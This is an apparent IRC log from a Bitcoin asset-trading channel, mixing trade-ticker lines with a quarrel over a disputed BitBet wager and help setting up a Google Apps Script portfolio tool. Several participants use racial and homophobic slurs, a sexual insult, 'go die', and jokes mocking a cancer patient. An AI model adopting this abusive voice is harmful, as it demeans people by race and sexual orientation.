0.023 BTC [+] Sep 08 20:46:46 [BTCTC] [TAT.ASICMINER] 11 @ 0.023 = 0.253 BTC [+] Sep 08 20:47:33 [BTCTC] [ASICMINER-PT] 1 @ 2.353 BTC [-] Sep 08 20:48:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.023 = 0.092 BTC [+] Sep 08 20:48:50 [BTCTC] [DMS.MINING] 3 @ 0.00289 = 0.0087 BTC [+] Sep 08 20:50:08 [HAVELOCK] [AM100] 400 @ 0.0203 = 8.12 BTC [-] Sep 08 20:52:32 [BTCTC] [PETA-MINE] 13 @ 0.6598 = 8.5774 BTC [-] Sep 08 20:52:50 [BTCTC] [PAJKA.BOND] 17 @ 0.012 = 0.204 BTC [+] Sep 08 20:54:18 [BTCTC] [PAJKA.BOND] 3 @ 0.01249 = 0.0375 BTC [+] Sep 08 20:54:29 [BTCTC] [DMS.PURCHASE] 1 @ 0.01208 BTC [-] Sep 08 20:54:39 [HAVELOCK] [AM100] 9 @ 0.02058 = 0.1852 BTC [+] Sep 08 20:55:06 [BTCTC] [PAJKA.BOND] 1 @ 0.0125 BTC [+] Sep 08 20:57:34 [BTCTC] [PETA-MINE] 40 @ 0.6599 = 26.396 BTC [+] Sep 08 21:05:24 [HAVELOCK] [AM100] 7 @ 0.02058 = 0.1441 BTC [+] Sep 08 21:05:42 [HAVELOCK] [AM100] 6 @ 0.0206 = 0.1236 BTC [+] Sep 08 21:08:13 [HAVELOCK] [AM100] 135 @ 0.0206 = 2.781 BTC [+] Sep 08 21:15:58 [HAVELOCK] [AM100] 25 @ 0.0211 = 0.5275 BTC [+] Sep 08 21:18:27 [HAVELOCK] [AM100] 31 @ 0.02189999 = 0.6789 BTC [+] Sep 08 21:18:30 [HAVELOCK] [AM100] 40 @ 0.0219 = 0.876 BTC [+] Sep 08 21:19:55 https://bitcointalk.org/index.php?topic=287172.0 Sep 08 21:20:00 Ukyo G.ASICMINER-PT fraud. Sep 08 21:20:30 so much incompetence allaround, wish i could sell it. Sep 08 21:22:32 You're fraudlulent too mr. kakobrekla Sep 08 21:22:39 with them fake bets to boost the books Sep 08 21:22:41 YEA I SAID IT Sep 08 21:22:51 O_o Sep 08 21:23:27 [HAVELOCK] [AM100] 52 @ 0.0219 = 1.1388 BTC [+] Sep 08 21:24:14 the truth of the matter is, there is only a few persons in the btw world that dont get sell their soul for some bitdust Sep 08 21:24:26 btc world Sep 08 21:24:47 [BTCTC] [BTC-TRADING-PT] 7 @ 1.11 = 7.77 BTC [+] Sep 08 21:25:24 [BTCTC] [ACTIVEMINING] 4 @ 0.003629 = 0.0145 BTC [+] Sep 08 21:26:10 [WTS] Soul, unused, as-new Sep 08 21:26:16 even high ranking CEO's are fraudulent so it's irreverant Sep 08 21:26:43 [BTCTC] [NASTY-PT] 1 @ 0.002 BTC [+] Sep 08 21:26:59 [BTCTC] [BTC-TRADING-PT] 6 @ 1.118 = 6.708 BTC [+] Sep 08 21:27:15 that logic is flawed, if they do it it doesnt mean you should too, unless idiot Sep 08 21:30:19 that wasn't my point kakobrekla lolololol Sep 08 21:31:23 my point was how can you expect idiots to not commit fraud, if even high ranking CEO's spend hundreds of millions to commit fraud Sep 08 21:32:24 [BTCTC] [DMS.MINING] 1 @ 0.00289 BTC [+] Sep 08 21:33:09 [BTCTC] [DMS.MINING] 30 @ 0.00289 = 0.0867 BTC [+] Sep 08 21:33:34 [BTCTC] [LTC-ATF.B2] 109 @ 0.01229 = 1.3396 BTC [+] Sep 08 21:33:49 so kakobrekla it's not that "they do it, you should too" more like "practice what you preach" Sep 08 21:34:10 [HAVELOCK] [AM100] 15 @ 0.0215 = 0.3225 BTC [-] Sep 08 21:34:13 e.g. if you're a powerful person and people live by your example, be somewhat fucking ethical Sep 08 21:36:13 [BTCTC] [ACTIVEMINING] 20 @ 0.00357 = 0.0714 BTC [-] Sep 08 21:36:14 [BTCTC] [ACTIVEMINING] 20 @ 0.003569 = 0.0714 BTC [-] Sep 08 21:37:37 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.000634 = 0.0127 BTC [-] Sep 08 21:42:02 [BTCTC] [DMS.MINING] 5 @ 0.00285 = 0.0143 BTC [-] Sep 08 21:43:15 http://thegenesisblock.com/easic-announces-24-ths-hash-fast-miner-activemining-shares-move-70/ my comment asking who paid for the article was removed. surprise! Sep 08 21:43:18 eASIC Announces 24 TH/s Fast-Hash Miner, ActiveMining Shares Move 70% - The Genesis Block Sep 08 21:43:33 also mentionning share price is back to what it was or lower Sep 08 21:43:37 [BTCTC] [TAT.MINIGAME] 4 @ 0.000243 = 0.001 BTC [+] Sep 08 21:45:49 [BTCTC] [DMS.MINING] 5 @ 0.00285 = 0.0143 BTC [-] Sep 08 21:47:18 ngzang-like ethical, i bet. Sep 08 21:50:17 [BTCTC] [BTC-BOND] 200 @ 0.01 = 2 BTC [+] Sep 08 21:55:58 [MPEX] [S.MPOE] 6146 @ 0.00089567 = 5.5048 BTC [+] Sep 08 21:56:16 [HAVELOCK] [AM1] 1 @ 2.333 BTC [+] Sep 08 21:59:47 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0006327 = 0.0019 BTC [-] Sep 08 22:00:23 [BTCTC] [COGNITIVE] 1 @ 0.3303 BTC [+] Sep 08 22:03:22 [BTCTC] [BASIC-MINING] 10 @ 0.12 = 1.2 BTC [+] Sep 08 22:03:25 [BTCTC] [ACTIVEMINING] 3 @ 0.003596 = 0.0108 BTC [+] Sep 08 22:04:13 [BTCTC] [ACTIVEMINING] 6 @ 0.00351 = 0.0211 BTC [-] Sep 08 22:04:15 [BTCTC] [ACTIVEMINING] 67 @ 0.003509 = 0.2351 BTC [-] Sep 08 22:04:16 [BTCTC] [ACTIVEMINING] 20 @ 0.003506 = 0.0701 BTC [-] Sep 08 22:04:17 [BTCTC] [ACTIVEMINING] 907 @ 0.003501 = 3.1754 BTC [-] Sep 08 22:04:27 [BTCTC] [BASIC-MINING] 8 @ 0.122 = 0.976 BTC [+] Sep 08 22:10:10 https://bitcointalk.org/index.php?topic=289316 Sep 08 22:10:15 BitBet incorrectly declares yes to a no bet. Stay Away from BitBet! Sep 08 22:10:18 has anyone read this thread? Sep 08 22:10:43 not this again :/ Sep 08 22:10:52 Can't belive BitBet blatantly made the bet a no when it should have been a yes Sep 08 22:11:26 Have any of you used bitbet?, have you considered staying away from bitbet after reading the post? Sep 08 22:11:39 also, I can't believe the unprofessionalism of luke-jr... very shocking. Sep 08 22:12:14 who is this pankkake character? he seems to be very angry about the post.... is he a bitbet employee? Sep 08 22:13:23 this fucking guy Sep 08 22:14:10 0/10 Sep 08 22:15:48 [BTCTC] [ACTIVEMINING] 1093 @ 0.003501 = 3.8266 BTC [-] Sep 08 22:16:28 [BTCTC] [ACTIVEMINING] 357 @ 0.0035 = 1.2495 BTC [-] Sep 08 22:16:50 pankkake: are you the same pankkake from the thread? Sep 08 22:16:51 [BTCTC] [ACTIVEMINING] 5 @ 0.0035 = 0.0175 BTC [-] Sep 08 22:17:11 pankkake: how come you are trolling that thread instead of adding positively to the discussion? your name-calling antics are very immature. Sep 08 22:17:11 [HAVELOCK] [LABCO] 1 @ 0.00312 BTC [-] Sep 08 22:19:40 ;;ud unit Sep 08 22:19:41 http://www.urbandictionary.com/define.php?term=unit | An absolute machine of a person. Looks like they never leave the gym and usually out to cause trouble. Sep 08 22:19:47 Urban Dictionary: unit Sep 08 22:21:16 I like how luke-jr and kludge are the main commentators, two of the least trustworthy people alive Sep 08 22:21:37 also, this guy is usagi Sep 08 22:22:01 yes. Luke-Jr seems not to be trustworthy at all... considering he also can't define the word 'unit' from what i'm reading in this post... Sep 08 22:22:16 i mean, its pretty obvoius that the OP posted the link to the website that mentioned what the unit was Sep 08 22:22:43 not sure why everyone is out to try and make up stories Sep 08 22:23:14 its pretty obvious that your mom is angry about you losing your pocket money again Sep 08 22:24:10 hehe Sep 08 22:24:17 cats say meow Sep 08 22:24:20 dogs say woff Sep 08 22:24:27 lions say roaaaaaar Sep 08 22:24:34 omg Sep 08 22:24:35 but seroiusly, the bet is obviously a no Sep 08 22:24:40 this channel is becoming worse everyday Sep 08 22:24:43 JESUS FUCKING CHRIST Sep 08 22:24:57 thestringpuller: /ignore is a great feature Sep 08 22:25:00 it's just one dude, ignore ftw Sep 08 22:25:02 thestringpuller: yeah, i've been reading the logs. i can't believe how brain dead Luke-Jr and pankkake are... its crazy Sep 08 22:25:02 also, scold users that don't Sep 08 22:25:32 thestringpuller: you should post to the thread like pankkake ... he's good at ignoring. take his advice on ignoring. Sep 08 22:25:49 dude I'm sick of niggas comin' up in here bein' all "dis mah turf yo. I is forum gangsta, respect me foo." Sep 08 22:25:59 The forums are lame and not a place for discourse at all Sep 08 22:26:14 but seriously. lets talk about it for a second... 2 units != 1 unit... i agree with the thread Sep 08 22:26:25 rembember kids, the bigger your post count is, the bigger your penis is Sep 08 22:26:26 who else agrees with the thread that the bet should be a no? Sep 08 22:28:17 [BTCTC] [DMS.MINING] 20 @ 0.002801 = 0.056 BTC [-] Sep 08 22:29:01 *tumbleweed* Sep 08 22:29:13 [BTCTC] [DMS.PURCHASE] 4 @ 0.01208 = 0.0483 BTC [-] Sep 08 22:30:01 dude go away Sep 08 22:30:12 bet was decided Sep 08 22:30:16 stop being butthurt Sep 08 22:30:16 go die Sep 08 22:31:37 wow. i just read this link http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ . seems pretty clear to me what a unit/kit was... i wonder why anyone would define it as something else? Sep 08 22:31:39 very strange.... Sep 08 22:31:48 lol Sep 08 22:31:51 you are being spammy. Sep 08 22:32:00 do you guys think maybe someone was paid off to make the bet a yes? integrity42 makes some good points. Sep 08 22:32:12 not that you are same person :) Sep 08 22:32:30 i almost listened to what pankkake said, but then i realized he was just trolling the thread , and can't be taken seriously Sep 08 22:32:50 how much did you lose? Sep 08 22:32:59 too late i already stopped caring Sep 08 22:33:01 fuck off Sep 08 22:33:19 stopped caring about what? Sep 08 22:33:25 I wonder if he believes himself Sep 08 22:33:25 oh, i didn't bet. i'm just reading the thread Sep 08 22:33:31 he's likely that insane Sep 08 22:33:53 shizo i bet, at this point. Sep 08 22:33:53 pankkake: who? are you the same pankkake from the thread? Sep 08 22:34:09 no he is pankkake with nutella Sep 08 22:34:18 that sounds amazing Sep 08 22:34:46 well Sep 08 22:34:49 its an amazing company! Sep 08 22:35:03 wow Sep 08 22:35:16 did you guys see punin's post stating that 400Gh can't be delivered in one unit? Sep 08 22:35:27 i hate you so much Sep 08 22:35:28 this is worse than reading youtube comments at this point Sep 08 22:35:29 thats really crazy.... Sep 08 22:35:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.02162 BTC [-] Sep 08 22:35:35 yeah Sep 08 22:35:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.02161 = 0.2161 BTC [-] Sep 08 22:35:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0216 BTC [-] Sep 08 22:35:40 broken record is broken Sep 08 22:35:56 that should basically prove the bet is a no. since the manufacturer himself said that 400Gh can't be delivered in 1 unit, and missed performance targets Sep 08 22:36:00 well I for one am enjoying this Sep 08 22:36:05 I'm going to have to agree with the OP here guys.... Sep 08 22:36:17 pankkake: given this new information, do you agree with the OP as well? Sep 08 22:36:17 some dude talking to himself Sep 08 22:36:23 pankkake: please post your thoughts to the thread Sep 08 22:36:23 whats not to love Sep 08 22:36:23 I'm irloling Sep 08 22:37:24 hey, did you guys ever realize that animals can talk? i mean think about it. cats saw meow. dogs say woof woof. birds say 'chirpy chirp. chirp chirp chiroo'.... thats pretty crazy. Sep 08 22:37:26 craving attention? Sep 08 22:37:44 and trains go choo choo Sep 08 22:37:49 well done for a 3 year old Sep 08 22:38:14 sorry guys, wrong channel, was trying to post to #poetry Sep 08 22:38:28 kakobrekla may have better insults than mircea_popescu Sep 08 22:38:39 :o Sep 08 22:38:56 im flattered Sep 08 22:39:19 i should start a kakobrekla insult list like I did with mircea_popescu : https://gist.github.com/leffuy/750a4291264fa2de03a5 Sep 08 22:39:35 "Well done for a 3 year old" that's pretty good. Sep 08 22:39:39 jurov: meh, no rush, it's just a crash Sep 08 22:40:23 lol i didnt know there was a collection Sep 08 22:40:30 [BTCTC] [DMS.MINING] 2 @ 0.002795 = 0.0056 BTC [-] Sep 08 22:40:36 its not a good insult Sep 08 22:40:49 thestringpuller: nice Sep 08 22:40:58 too obvoius Sep 08 22:41:16 It's a wonder you manage to find the keyboard catmeow_ Sep 08 22:41:19 see that worked. Sep 08 22:41:30 too obvious, your sockpuppeting is what you are talking about? :) Sep 08 22:41:52 brb Sep 08 22:41:54 cats say meow, meow... but sometimes they say purrrrrr also.... thats when they want you to pet them... incase you guys were wondering... Sep 08 22:42:02 but seroiusly, back on topic.... its obvoius the bet was a no Sep 08 22:42:12 400Gh UNIT 400W.... Sep 08 22:42:18 You're an idiot. Go away. (#7 on the list) Sep 08 22:42:33 Oh wow I came up with a good idea. Sep 08 22:42:36 InsultBot Sep 08 22:42:37 this does not exist. how can the bet be a yes if all clauses in the bet weren't met? the hardware didn't meet performance targets Sep 08 22:42:43 i'm going to have to agree with the OP in the thraed Sep 08 22:42:44 I like #12 Sep 08 22:43:18 Why's your mouth open catmeow_ if there's no cock going in and out of it? Sep 08 22:43:38 what does that mean? Sep 08 22:43:51 [BTCTC] [S.MPOE-PT] 7 @ 0.0008979 = 0.0063 BTC [+] Sep 08 22:44:13 im sorry i dont understand Sep 08 22:44:19 how is that relevant to the bet we're discussing about? Sep 08 22:44:36 Suppose you read up on things first, and get in people's way second? Sep 08 22:45:11 thestringpuller: do you think the bet is a yes or no? how come? lets discuss. Sep 08 22:47:00 at some point you're going to have to pay people to listen to you Sep 08 22:47:08 [HAVELOCK] [AM100] 10 @ 0.021 = 0.21 BTC [-] Sep 08 22:47:11 or buy me a copy of GTA-V Sep 08 22:47:31 i'll listen to you all day if you send me 0.6 btc Sep 08 22:47:38 pankkake: why would thestringpuller have to pay people to listen to him? Sep 08 22:48:07 your attempts at making people rage are pretty bad Sep 08 22:48:20 for 1 BTC/h I can teach you Sep 08 22:48:24 pankkake: thestringpuller isn't making people rage... why are you such a jerk? Sep 08 22:48:43 lol Sep 08 22:49:11 it's good to know this channel hasn't gone the bitcoin-otc route despite the continued recession of assets into the eternal september Sep 08 22:49:12 see, you're pretending I'm not talking to you, and yet, replying instantly Sep 08 22:49:22 pankkake: are you not talking about thestringpuller? try typing the first 2 characters of the person you're talking to, then hit tab -- its tab completion Sep 08 22:49:26 you're bad at faking that stuff Sep 08 22:49:52 see, you're pretending I'm not talking to you, and yet, replying instantly ----- LOL pwned you!!!!!!! you said you had me on ignore!! pwn3d!!! pwnzi3z!!!!!!!! loooooooollllllllz !!!!!!!! ur so mad huh Sep 08 22:49:56 I think highlights are unecessary when they are clear Sep 08 22:50:00 ooooooooomg u mad? Sep 08 22:50:07 seriously tho... u mad? Sep 08 22:50:33 ok guys back on topic.... so the bet basically says 400Gh unit 400W.... lets break down what this means Sep 08 22:50:35 you know in the time you've been in this channel catmeow Sep 08 22:50:43 kakobrekla: has probably made like 1 btc Sep 08 22:50:43 I can't ignore your many nicks. I could ignore all webchats, as no one interesting is going to use the web chat Sep 08 22:51:08 real men use irssi Sep 08 22:51:12 /window 1324 Sep 08 22:51:18 not for long, he's going to bankrupt bitbet remember Sep 08 22:51:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02287 BTC [+] Sep 08 22:51:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.02288 = 0.2288 BTC [+] Sep 08 22:51:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.0229 = 0.1145 BTC [+] Sep 08 22:51:34 did the chatroom rules include anything about obvious switching of handles and spammy trolling, etc? Sep 08 22:51:35 [BTCTC] [TAT.ASICMINER] 84 @ 0.023 = 1.932 BTC [+] Sep 08 22:51:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.02348 = 0.4696 BTC [+] Sep 08 22:51:37 [BTCTC] [TAT.ASICMINER] 7 @ 0.02349 = 0.1644 BTC [+] Sep 08 22:51:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.02349 = 0.4698 BTC [+] Sep 08 22:51:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.0235 = 0.0705 BTC [+] Sep 08 22:51:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.0235 = 1.175 BTC [+] Sep 08 22:51:43 there are no rule ThickAsThieves Sep 08 22:51:49 the non-rules Sep 08 22:51:52 who are the kings of this chatroom? Sep 08 22:51:53 any guidelines are non-enforced Sep 08 22:51:59 kakobrekla is the moderator Sep 08 22:52:02 assbot is the bouncer Sep 08 22:52:11 kakobrekla is the super servant Sep 08 22:52:14 yea Sep 08 22:52:18 any of you using namworld's spreadsheet template? Sep 08 22:52:26 mp is the non-rule maker Sep 08 22:52:33 for accounting Duffer1 ? Sep 08 22:52:41 like his bitvps sheets? Sep 08 22:53:00 the auto updating portfolio template https://bitcointalk.org/index.php?topic=140427.0 Sep 08 22:53:05 so basically if we break the bet down, we can see that it says 'must meet advertised performance' and mentions the 400Gh unit at 400W.... if we look closely we see that the 400Gh unit contains 1M-board and 16H-cards.... it seems that this combination doesn't hash at 400Gh. it hashes at 365Gh.... therefore the hardware missed performance targets, therefore the bet is a no..... bitbet made the bet pass, so therefore there is som Sep 08 22:53:14 what are your guys opinions on this ??? Sep 08 22:53:35 [BTCTC] [DMS.PURCHASE] 2 @ 0.01208 = 0.0242 BTC [-] Sep 08 22:53:48 [BTCTC] [LABCOIN] 5 @ 0.003695 = 0.0185 BTC [+] Sep 08 22:53:49 [BTCTC] [LABCOIN] 98 @ 0.003696 = 0.3622 BTC [+] Sep 08 22:53:50 [BTCTC] [LABCOIN] 85 @ 0.003698 = 0.3143 BTC [+] Sep 08 22:53:51 [BTCTC] [LABCOIN] 1312 @ 0.003699 = 4.8531 BTC [+] Sep 08 22:54:02 Are you guys concerned that BitBet might have been bribed by Anduck / pankkake to pass the bet as yes, even though it was obviously a no? Sep 08 22:54:12 i'd be pretty worried about that.... I'm going to have to agree with the OP Sep 08 22:54:33 have you been here using a nick "fractal" or "wogwog" ? Sep 08 22:54:49 i have no idea how to get the functions to work and no idea where to start Sep 08 22:54:51 [BTCTC] [DMS.MINING] 7 @ 0.002849 = 0.0199 BTC [+] Sep 08 22:55:00 Duffer1: yea I've used that before, but it takes too long for the javascript to run Sep 08 22:55:04 Anduck: no. i've been reading the logs and the forum posts.... I've heard rumours you paid off BitBet to pass the bet. is that true? Sep 08 22:55:08 What's the issue Duffer1 ? Sep 08 22:55:25 catmeow_: well what do you think? Sep 08 22:55:51 catmeow_: don't you see the bet was clearly a yes? read the thread you're refering to Sep 08 22:56:03 it's got pretty valid points why it's a "yes" Sep 08 22:56:04 catmeow_: yes, I'm sorry, I confess. I bribed bitbet to make you rage, which is worth more to me than losing the bet Sep 08 22:56:14 Duffer1: you know how to put scripts in Google Docs? Sep 08 22:56:18 Anduck: I think the bet was badly worded... and probably should have been cancelled. But if you follow technicalities it probably should have been a no. although most of the conditions were met. i will concede this. Sep 08 22:56:19 thestringpuller i'm probably the issue, do you have any advice on how to get something like namwords idea working, something noobproof i mean Sep 08 22:56:33 catmeow_: there is no definition of unit. Sep 08 22:56:36 One second, so much spam from catmeow_ Sep 08 22:56:38 ya but that's about the extent of my knowledge Sep 08 22:56:52 therefore you can't say that unit is 1 m-board with 16 h-boards OR unit is 1 m-board with 1 h-board. Sep 08 22:56:53 What do you need specifically the data from the various exchanges? Sep 08 22:56:54 so is it catmeow=fractal=vancleef=bithub? Sep 08 22:57:10 ThickAsThieves, no afaik, only catmeow=fractal=wogwog Sep 08 22:57:18 Anduck: well, a unit certainly shouldn't be regarded as two seperate mining devices. Sep 08 22:57:19 dunno really Sep 08 22:57:25 catmeow_: why? Sep 08 22:57:31 unit can be a group of units Sep 08 22:57:48 it's clear that when you order 400gh and get 400gh, it's obviously delivered. Sep 08 22:57:56 the google docs thing isn't working for me Sep 08 22:58:02 the hardware just isn't as advertised but the bet wasnt about that Sep 08 22:58:06 Anduck: that would be cheating. i think , lets be honest -- everyone read the website and assumed the 400Gh unit to be exactly what hardware was described on the website. Sep 08 22:58:10 securities owned + amount of units + volume weighted price of units + last price Sep 08 22:58:21 catmeow_: seriously, read the thread. Sep 08 22:58:24 _read_ it Sep 08 22:58:26 Duffer1: open up developer tools in chrome and try out some of those functions I think they work Sep 08 22:58:39 Anduck: yes. 400Gh was delivered. but the 400Gh unit didn't hash at 400Gh Sep 08 22:58:44 the ones namworld posted Sep 08 22:58:53 what is 400gh unit? Sep 08 22:58:57 it wasn't defined anywhere? Sep 08 22:59:06 the only ones i could get working were balance Sep 08 22:59:13 its defined on the bitfurystrikesback website -- the link is in the thread. Sep 08 22:59:19 oh wow Sep 08 22:59:26 hmm Sep 08 22:59:47 that's why i'm sayin i'm probably the problem hehe Sep 08 22:59:47 like only your havelock balance/btctc balance? etc? Sep 08 22:59:53 yea Sep 08 23:00:01 just trynna to trouble shoot Sep 08 23:00:08 I'm testing the functions raw inside my browser Sep 08 23:00:51 [BTCTC] [ASICMINER-PT] 1 @ 2.464 BTC [+] Sep 08 23:00:52 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [+] Sep 08 23:00:53 [BTCTC] [ASICMINER-PT] 3 @ 2.466 = 7.398 BTC [+] Sep 08 23:01:09 just gimme a sec duffer1 Sep 08 23:01:17 I'll try to put something on gist in a sec Sep 08 23:01:41 i suspect i'm not using the functions properly Sep 08 23:02:27 i'll see in a second Sep 08 23:02:42 running them in chrome real quick Sep 08 23:02:58 i appreciate man Sep 08 23:03:00 it* Sep 08 23:03:12 no problem, i didn't know namworld had built a toolkit like this Sep 08 23:03:30 much easier than logging into every site pulling numbers and dumping that into calculators Sep 08 23:03:42 get the numbers raw via the toolkit, operate accordingly Sep 08 23:03:44 exactly Sep 08 23:04:00 looks like it will be a good october if this does work ;) Sep 08 23:04:40 good october? Sep 08 23:05:34 yea, I'm going to dump more of my bank assets into crypto wealth come october Sep 08 23:05:54 September I'm planning to sit on my ass and play GTA-V ;) Sep 08 23:06:01 ha Sep 08 23:06:07 i found one problem: CacheService Sep 08 23:06:13 CacheService is undefined Sep 08 23:06:24 missing some imports... Sep 08 23:07:18 i'm still just starting out, being cautious with my pile, getting a tool like this working proper would be a huge help to me Sep 08 23:13:52 nvm it's supposed to be inherent in google api Sep 08 23:13:52 https://developers.google.com/apps-script/reference/cache/cache-service Sep 08 23:13:52 yea it looks like the functions are legit Duffer1 Sep 08 23:13:52 Duffer1: do this. Go to script.google.com , create a new script project. Dump all that code the namworld posted into the main code file (you can name this whatever you want). Change the API keys to match your own from BTCTC and Havelock etc. Sep 08 23:13:52 then click run and run one of the functions with input variables Sep 08 23:13:53 Class CacheService - Google Apps Script — Google Developers Sep 08 23:14:54 yea the scripts work Sep 08 23:14:59 or all the ones I've tested so far Sep 08 23:15:19 tested BTCTasset BTCTbalance BTCTcontract etc. Sep 08 23:15:39 do you know how to work with script.google.com ? Sep 08 23:15:42 so i must be using it wrong Sep 08 23:15:48 it's pretty easy, like google docs for scripts Sep 08 23:15:56 just make a standalone script for now, dump the code in raw Sep 08 23:15:59 and then run it Sep 08 23:16:03 [BTCTC] [PETA-MINE] 7 @ 0.6599 = 4.6193 BTC [+] Sep 08 23:16:04 I can make some imgurs for you if you want Sep 08 23:16:14 i think i love you Sep 08 23:16:51 [BTCTC] [BTC-TRADING-PT] 16 @ 1.126 = 18.016 BTC [+] Sep 08 23:17:43 so i've copypastad the script to script.google.com, changed the keys to mine Sep 08 23:18:00 [BTCTC] [ASICMINER-PT] 2 @ 2.465 = 4.93 BTC [-] Sep 08 23:18:09 http://imgur.com/a/qDCdn Sep 08 23:18:10 Namworlds Script Basic Tutorial - Imgur Sep 08 23:18:11 check that out Sep 08 23:18:36 use my TestSecurities function to test his BTCTC function Sep 08 23:18:47 ^@ Duffer1 Sep 08 23:18:55 kk Sep 08 23:19:38 basically make a unit test function that feeds hardcoded data into Namworld's functions, then run that function Sep 08 23:19:48 the first time it will ask for access to external api's just accept that Sep 08 23:19:49 Hey guys, i sent bitfurystrikesback a personal email to see if they can describe what fits in a 400Gh unit. Sep 08 23:20:06 then go to view, view execute log Sep 08 23:20:13 it'll bring up the raw JSON for you Sep 08 23:20:24 and voila you have a basic testing environment to use his functions Sep 08 23:20:35 thestringpuller: if this was -otc catmeow_ would have ops Sep 08 23:21:10 "Hi bitfury, I'm interesed in ordering 10 400Gh units, but I dont understand what a 'unit' is comprised of, can you please let me know what hardware will be included in a 400Gh unit? Thanks" I'll let you guys know what the response is... i'm assuming they'll take me seriously because i said i'm intereseted in buying 4Th/sec Sep 08 23:21:44 that should pretty quickly clear things up Sep 08 23:21:57 can't belive no-one thought about that earlier! lolcats!!! Sep 08 23:22:18 Missing formal parameter. (line 240, file "e") Sep 08 23:22:33 you mis-copy pasted something Sep 08 23:22:41 dub- whats ops and otc? Sep 08 23:22:46 can you dump everything into a pastie? http://pastie.org Sep 08 23:22:53 dub: is that hacker talk? Sep 08 23:23:22 dub: can u help me hack my bf's email. i think hes cheating on me. k thnx Sep 08 23:23:35 told you its usagi Sep 08 23:23:44 http://pastie.org/8309085 Sep 08 23:23:44 TIL catmeow_ wishes he was a girl Sep 08 23:23:49 whats a usagi?? Sep 08 23:23:50 gender identity crisis in progress Sep 08 23:23:50 #8309085 - Pastie Sep 08 23:23:58 who wouldn't wish to be a girl? Sep 08 23:24:03 thestringpuller: its called being gay you homophobic asshole Sep 08 23:24:14 wow you guys are homophobic bigots Sep 08 23:24:18 unbelieveable Sep 08 23:24:25 Duffer1: line 240 you have testsecurities(() Sep 08 23:24:26 oh extra ( Sep 08 23:24:27 go away faggot Sep 08 23:24:40 jurov: is gay, but he's not nearly as annoying as you catmeow_ Sep 08 23:24:44 there are laws against bullying online Sep 08 23:24:46 stop that Sep 08 23:25:00 there should be laws against stupidity Sep 08 23:25:02 lol Sep 08 23:25:08 dub: thats really rude of you to say. seriously. Sep 08 23:25:26 dub: i think you shouldn't be so bigoted. go to russia if you want to hate gay people. Sep 08 23:25:32 Duffer1: yea see if that works Sep 08 23:25:55 dub: but seroiusly... lets talk about the bet for a second... what do you think a unit is? Sep 08 23:26:03 what bet? Sep 08 23:26:41 the bet in this thread that everyone has been talking about for the last few days Sep 08 23:26:41 https://bitcointalk.org/index.php?topic=289316.0 Sep 08 23:26:46 pauvre petit chat malade Sep 08 23:26:47 BitBet incorrectly declares yes to a no bet. Stay Away from BitBet! Sep 08 23:26:48 unit means penis Sep 08 23:26:50 then execution transcript? Sep 08 23:27:04 catmeow_: I dont use bitcointalk, only faggots and niggers on there Sep 08 23:27:20 yes Duffer1 execution transcript Sep 08 23:27:35 you should get a bunch of json Sep 08 23:27:50 it works Sep 08 23:27:57 [HAVELOCK] [VTX] 5 @ 0.59 = 2.95 BTC [+] Sep 08 23:29:25 now to get it set up in spreadsheet form hehe Sep 08 23:30:14 dub: thats 2 bad words in one sentence. I think you should be nicer. Sep 08 23:30:23 :D Sep 08 23:30:53 catmeow_: instead of trolling, do something useful, like I don't know http://savenatenow.com/campaigns/?term=donate&src=pastie <- saving that guy from cancer Sep 08 23:31:07 by donating the coins that you obviously aren't using Sep 08 23:31:43 why would we want to save an american from cancer, cancer was invented to get rid of americans Sep 08 23:31:54 i'm not trolling. Sep 08 23:31:58 dub: thats also not nice Sep 08 23:32:41 if you guys had sane social policy he'd be getting free medical care anyway Sep 08 23:32:55 brought it on yallselves Sep 08 23:33:02 that might be true, but dont be mean Sep 08 23:33:28 thestringpuller so what Namworld put together was a base layer that someone can build functions on top of? Sep 08 23:34:09 dub I fucking love you Sep 08 23:34:18 i seriously rofl'ed Sep 08 23:34:18 <3 Sep 08 23:35:03 breaking bad canadian edition: "You have cancer. You start treatment tomorrow. All paid for" THE END Sep 08 23:35:11 lol Sep 08 23:35:22 thestringpuller: why would you laugh at him making a joke about someone with cancer? you're an asshole. Sep 08 23:35:29 not even touching on why little lizzy would want to watch her dad grow old, he's poor ffs Sep 08 23:35:53 are you guys for real? Sep 08 23:35:56 what a bunch of pricks Sep 08 23:36:20 catmeow_: cause it's true, american's fucked themselves over because we are willing to listen to corrupt politicians Sep 08 23:36:33 we'd rather have pure capitalism than socialized medicine Sep 08 23:36:42 it's okay to pay for the cops to beat up a nigga with tax payer money Sep 08 23:36:54 but someone gets cancer and tax payers pay for it, you've gone too far Sep 08 23:36:54 yeah , and because of that you laugh at the guy with cancer? like its his fault he didnt get medicare passed? Sep 08 23:37:05 dude I donated .1 bitcoin Sep 08 23:37:10 go fuck yourself catmeow_ Sep 08 23:37:22 thestringpuller: well you cancelled that out by laughing at him. Sep 08 23:37:43 and joking about poor people without healthcare. Sep 08 23:37:48 you people are pricks Sep 08 23:37:56 and you're an idiot Sep 08 23:38:20 thats not nice. Sep 08 23:39:00 [BTCTC] [DMS.MINING] 13 @ 0.002849 = 0.037 BTC [+] Sep 08 23:39:02 [BTCTC] [DMS.MINING] 381 @ 0.00285 = 1.0859 BTC [+] Sep 08 23:39:03 [BTCTC] [DMS.MINING] 299 @ 0.00289 = 0.8641 BTC [+] Sep 08 23:39:04 [BTCTC] [DMS.MINING] 10 @ 0.002897 = 0.029 BTC [+] Sep 08 23:39:05 [BTCTC] [DMS.MINING] 5 @ 0.0029 = 0.0145 BTC [+] Sep 08 23:39:06 [BTCTC] [DMS.MINING] 7 @ 0.0029 = 0.0203 BTC [+] Sep 08 23:39:07 [BTCTC] [DMS.MINING] 41 @ 0.00291 = 0.1193 BTC [+] Sep 08 23:39:08 [BTCTC] [DMS.MINING] 200 @ 0.00295 = 0.59 BTC [+] Sep 08 23:39:10 